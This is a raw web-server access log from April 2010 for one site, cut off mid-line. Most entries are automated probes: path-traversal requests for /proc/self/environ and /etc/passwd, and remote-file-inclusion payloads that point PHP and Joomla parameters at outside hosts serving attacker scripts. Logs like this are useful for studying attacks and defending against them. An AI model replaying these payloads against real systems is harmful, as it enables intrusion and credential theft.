163.24.136.10 - - [28/Apr/2010:05:17:47 -0700] "GET /index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
163.24.136.10 - - [28/Apr/2010:05:17:48 -0700] "GET /logs//index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:39:18 -0700] "GET /delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:39:18 -0700] "GET /logs//delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:41:50 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:41:50 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
67.195.113.247 - - [28/Apr/2010:05:46:36 -0700] "GET /?M=D HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:48:23 -0700] "GET /delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:48:15 -0700] "GET /logs//delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:49:38 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:49:38 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:54:39 -0700] "GET /logs//delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:05:54:44 -0700] "GET /delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
208.116.11.84 - - [28/Apr/2010:06:00:25 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://honamh.hs.kr/home/_sys/_var/db/set/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.elfagr.net"
208.116.11.84 - - [28/Apr/2010:06:00:25 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://honamh.hs.kr/home/_sys/_var/db/set/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:00:46 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:00:55 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:14:18 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:14:10 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:19:25 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:19:16 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:19:24 -0700] "GET /logs//delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:19:24 -0700] "GET /delete_all.php?board_skin_path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:32:32 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:32:23 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:37:37 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:37:29 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
72.26.122.245 - - [28/Apr/2010:06:41:43 -0700] "GET /logs//index.php?option=com_smf&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.26.122.245 - - [28/Apr/2010:06:41:43 -0700] "GET /index.php?option=com_smf&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.26.122.245 - - [28/Apr/2010:06:41:43 -0700] "GET /logs/access_091001.log//index.php?option=com_smf&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:46:57 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:47:06 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
72.26.122.245 - - [28/Apr/2010:06:49:22 -0700] "GET /logs/access_091126.log%20%20//index.php?option=com_smf&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.26.122.245 - - [28/Apr/2010:06:49:27 -0700] "GET /logs/access_091001.log%20%20//index.php?option=com_smf&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:50:35 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:50:44 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:53:22 -0700] "GET /includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
69.175.13.74 - - [28/Apr/2010:06:53:22 -0700] "GET /logs//includes/class_item.php?fileExtension=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
216.129.119.42 - - [28/Apr/2010:07:02:48 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
65.55.207.100 - - [28/Apr/2010:07:09:06 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.elfagr.net"
67.195.113.247 - - [28/Apr/2010:08:07:08 -0700] "GET /?D=D HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
67.195.113.247 - - [28/Apr/2010:08:28:20 -0700] "GET /logs/access_091022.log HTTP/1.0" 200 1127990 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:08:43:57 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:08:43:57 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:08:44:02 -0700] "GET /logs/access_091015.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:08:44:11 -0700] "GET /logs/access_091126.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
64.15.156.83 - - [28/Apr/2010:08:52:50 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
64.15.156.83 - - [28/Apr/2010:08:52:46 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
64.15.156.83 - - [28/Apr/2010:08:52:54 -0700] "GET /logs/access_091126.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
64.15.156.83 - - [28/Apr/2010:08:52:46 -0700] "GET /logs/access_091015.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:09:53:37 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.frenchvineyards.fr/images/stories/news/img/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:09:53:37 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.frenchvineyards.fr/images/stories/news/img/test.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:09:59:42 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:09:59:42 -0700] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:09:59:42 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://sportsulsan.co.kr/poll/aipi/id.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.249.126.147 - - [28/Apr/2010:10:21:23 -0700] "GET /logs/access_091112.log/'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.249.126.147 - - [28/Apr/2010:10:21:23 -0700] "GET /'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.249.126.147 - - [28/Apr/2010:10:21:15 -0700] "GET /logs/'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:10:34:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.frenchvineyards.fr/images/stories/news/img/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
89.252.252.20 - - [28/Apr/2010:10:34:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.frenchvineyards.fr/images/stories/news/img/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
88.250.57.232 - - [28/Apr/2010:11:10:19 -0700] "GET /logs/access_100427.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.elfagr.net"
88.250.57.232 - - [28/Apr/2010:11:10:11 -0700] "GET /logs/access_100428.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.elfagr.net"
92.0.228.16 - - [28/Apr/2010:11:44:39 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.elfagr.net"
92.0.228.16 - - [28/Apr/2010:11:44:41 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.elfagr.net"
92.0.228.16 - - [28/Apr/2010:11:44:46 -0700] "GET / HTTP/1.1" 200 1465 "http://www.elfagr.net/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.elfagr.net"
211.174.185.131 - - [28/Apr/2010:11:47:21 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.174.185.131 - - [28/Apr/2010:11:47:13 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.174.185.131 - - [28/Apr/2010:11:47:13 -0700] "GET /logs/access_091126.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:51:34 -0700] "GET /skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:51:34 -0700] "GET /logs/access_091203.log//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:51:34 -0700] "GET /logs//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:51:52 -0700] "GET /logs/access_091203.log//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:51:52 -0700] "GET /logs//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:52:01 -0700] "GET /skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:00 -0700] "GET /skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:00 -0700] "GET /logs//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:00 -0700] "GET /logs/access_090910.log%20%20//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:01 -0700] "GET /skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:01 -0700] "GET /logs/access_090910.log%20%20//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:09 -0700] "GET /logs//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:29 -0700] "GET /logs/access_091203.log%20%20//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
123.30.181.5 - - [28/Apr/2010:11:58:30 -0700] "GET /logs/access_091203.log%20%20//skin/happycast_category_lightblack/error.php?dir=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.195.113.247 - - [28/Apr/2010:12:17:49 -0700] "GET /logs/access_100211.log HTTP/1.0" 200 390652 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
93.158.149.32 - - [28/Apr/2010:12:39:33 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:12:54:20 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
110.45.146.38 - - [28/Apr/2010:12:57:09 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
110.45.146.38 - - [28/Apr/2010:12:57:00 -0700] "GET /logs/access_091203.log%20%20//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
110.45.146.38 - - [28/Apr/2010:12:57:03 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:12:22 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
217.20.125.11 - - [28/Apr/2010:13:12:47 -0700] "GET /index.php?option=com_jeformcr&view=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
217.20.125.11 - - [28/Apr/2010:13:12:56 -0700] "GET /index.php?option=com_jeformcr&view=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:12:52 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:12:52 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:13:01 -0700] "GET /logs/access_091029.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:12:56 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:12:56 -0700] "GET /logs/access_091029.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:12:59 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:13:10 -0700] "GET /logs/access_090917.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:13:10 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:13:10 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.834" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:13:14 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:13:22 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.1.227 - - [28/Apr/2010:13:13:14 -0700] "GET /logs/access_091029.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.220.215.34 - - [28/Apr/2010:13:19:40 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:25:16 -0700] "GET /logs/access_091119.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:25:25 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:25:16 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.834" "www.elfagr.net"
74.52.35.234 - - [28/Apr/2010:13:32:58 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
64.34.165.224 - - [28/Apr/2010:13:34:53 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
93.158.149.32 - - [28/Apr/2010:13:38:56 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
74.52.35.234 - - [28/Apr/2010:13:52:46 -0700] "GET /logs/access_091203.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
74.52.35.234 - - [28/Apr/2010:13:52:54 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "www.elfagr.net"
74.52.35.234 - - [28/Apr/2010:13:52:46 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.834" "www.elfagr.net"
74.52.35.234 - - [28/Apr/2010:13:55:21 -0700] "GET /logs/access_091210.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/e